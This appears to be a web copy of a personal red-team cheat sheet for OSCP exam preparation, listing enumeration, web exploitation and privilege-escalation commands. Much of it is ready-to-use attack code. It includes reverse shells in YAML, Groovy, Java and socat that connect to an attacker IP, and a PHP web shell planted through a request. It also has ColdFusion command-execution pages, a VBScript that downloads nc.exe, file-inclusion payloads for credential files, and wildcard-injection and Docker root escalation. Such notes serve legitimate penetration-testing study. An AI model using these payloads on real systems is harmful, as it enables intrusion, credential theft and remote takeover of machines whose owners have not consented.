Home

Awesome

redteam-notebook

Collection of commands, tips and tricks and references I found useful during preparation for OSCP exam.

Early Enumeration - generic

Network wide scan - first steps

nmap -sn 10.11.1.0/24

netbios scan

nbtscan -r 10.11.1.0/24

DNS recon

dnsrecon -r 10.11.1.0/24 -n <DNS IP>

Scan specific target with nmap

nmap -sV -sT -p- <target IP>

Guess OS using xprobe2

xprobe2 <target IP>

Check Netbios vulns

nmap --script-args=unsafe=1 --script smb-check-vulns.nse -p 445 target

Search for SMB vulns

nmap -p139,445 <target IP> --script smb-vuln*

Enumerate using SMB (null session)

enum4linux -a <target IP>

Enumerate using SMB (w/user & pass)

enum4linux -a -u <user> -p <passwd> <targetIP>

Website Enumeration

quick enumeration using wordlist

gobuster -u http://<target IP> -w /usr/share/dirb/wordlists/big.txt

enumeration and basic vuln scan of a website

nikto -host http://<target IP>

Website tips and tricks

Python

!!python/object/apply:os.system ["bash -i >& /dev/tcp/yourIP/4444 0>&1"]

PHP

Add /etc/passwd%00 to any GET/POST arguments. On windows try C:\Windows\System32\drivers\etc\hosts%00 or C:\autoexec.bat%00. A quick win could also be any of these files c:\sysprep.inf, c:\sysprep\sysprep.xml or c:\unattend.xml as they would contain local admin credentials. On linux it's worth checking /proc/self/environ to see if there are any credentials passed to the running process via env vars.

/index.php?somevar=php://filter/read=convert.base64-encode/resource=<file path>%00 this will return base64 encoded PHP file. Good for fishing up config.php or similar.

with netcat send a request like this:

GET /<?php system($_GET["cmd"]);?>

ColdFusion

Debugging & Logging -> Scheduled Tasks -> url=<path to our executable>, Publish - save output to file (some writable path). Then manually execute this task which will download and save our file.

To execute it create a probe Debugging & Logging -> System probes -> URL=<some URL>, Probe fail - fail if probe does not contain "blahblah", Execute program <path to our downloaded exe>. And then run probe manually.

<html>
<body>
<cfexecute name = "#URL.runme#" arguments =
"#URL.args#" timeout = "20">
</cfexecute>
</body>
</html>
<cfset runtime = createObject("java",
"java.lang.System")>
<cfset props = runtime.getProperties()>
<cfdump var="#props#">
<cfset env = runtime.getenv()>
<cfdump var="#env#">

dir busting

Reverse Shell Howto

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/yourIP/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());
while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());
so.flush();po.flush();
Thread.sleep(50);
try {p.exitValue();
break;
}catch (Exception e){}};
p.destroy();
s.close();

xterm -display yourIP:1

And on your side authorize the connection with xhost +targetIp and catch it with Xnest :1

Listener: socat file:`tty`,raw,echo=0 yourIP:4444

target: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:yourIP:4444

Interactive Shell Upgrade Tricks

Then Ctrl-Z back to local shell and stty raw -echo, then back to remote shell with fg and set terminal with export TERM=xterm.

sh.exp

#!/usr/bin/expect
spawn sh
interact

Inside Windows

c:\sysprep.inf
c:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://yourIp/nc.exe", False
xHttp.Send

with bStrm
    .type = 1 \'//binary
    .open
    .write xHttp.responseBody
    .savetofile "C:\\Users\\Public\\nc.exe", 2 \'//overwrite
end with

Inside Linux

System info
uname -a

Arch
uname -m

Kernel
cat /proc/version

Distro
cat /etc/*-release or cat /etc/issue

Filesystem
df -a

Users
cat /etc/passwd

Groups
cat /etc/group

Super accounts
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'

Currently logged in
finger, w, who -a, pinky, users

Last logged users
last, lastlog

Cheeky test -
sudo -l

Anything interesting we can run as sudo?
sudo -l 2>/dev/null | grep -w 'nmap|perl|awk|find|bash|sh|man|more|less|vi|vim|nc|netcat|python|ruby|lua|irb' | xargs -r ls -la 2>/dev/null

History -
history

Env vars
env

Available shells
cat /etc/shells

SUID files
find / -perm -4000 -type f 2>/dev/null

SUID owned by root
find / -uid 0 -perm -4000 -type f 2>/dev/null

GUID files
find / -perm -2000 -type f 2>/dev/null

World writable
find / -perm -2 -type f 2>/dev/null

World writable executed
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null

World writable dirs
find / -perm -2 -type d 2>/dev/null

rhost files
find /home –name *.rhosts -print 2>/dev/null

Plan files
find /home -iname *.plan -exec ls -la {} ; -exec cat {} 2>/dev/null ;

hosts.equiv
find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null ; -exec cat {} 2>/dev/null ;

Can we peek at /root?
ls -ahlR /root/

Find ssh files
find / -name "id_dsa*" -o -name "id_rsa*" -o -name "known_hosts" -o -name "authorized_hosts" -o -name "authorized_keys" 2>/dev/null |xargs -r ls -la

Inetd
ls -la /usr/sbin/in.*

Grep logs for loot
grep -l -i pass /var/log/*.log 2>/dev/null

What do we have in logs
find /var/log -type f -exec ls -la {} ; 2>/dev/null

Find conf files in /etc
find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} ; 2>/dev/null

as above
ls -la /etc/*.conf

List open files
lsof -i -n

Can we read root mail?
head /var/mail/root

What is running as root?
ps aux | grep root

Lookup paths to running files
ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'

Exports and permissions of NFS
ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null

List sched jobs
ls -la /etc/cron*

List open connections (run with sudo/as root for more results)
lsof -i

Installed pkgs: dpkg -l (debian), rpm -qa (RH)

sudo version?
sudo -V

Available compilers
dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null

If you find a privileged bash shell which uses wildcard when iterating over files on folder you can create files in note that you can create files which names will be parsed as arguments to the command that is used to iterate over said files. This opens up interesting attack vector, ie when there's a for loop and inside the loop script executes for example cp on each file. If you create file with touch -- '--someargument' it will be passed to the command as --someargument. Good example is if such script copies files somewhere. Adding a file named --preserve=mode and also copying /bin/bash in same folder and changing its mode to 4755 will result the script copying bash as a root with suid permissions. Executing that copy of bash with bash -p will result in bash running as root.

Docker tips

Since most likely Docker runs as root if you can execute docker commands as unpriviledged user you can very likely use Docker's privs instead.

docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash - note that the root folder from host is mounted as /host. You'll also see all processes running on host and be connected to same NICs.

You may want to look into escaping UTS and IPC namespacing with --uts=host --ipc=host

Upload files using cUrl with WebDAV

curl -T nc.exe http://targetIP/nc.txt
curl -X MOVE -v -H "Destination:http://targetIP/nc.exe" http://targetIP/nc.txt

msfvenom

List payloads

msfvenom -l

Binaries

Web Payloads

Scripting Payloads

Shellcode

For all shellcode see msfvenom –help-formats for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.

Shellshock

References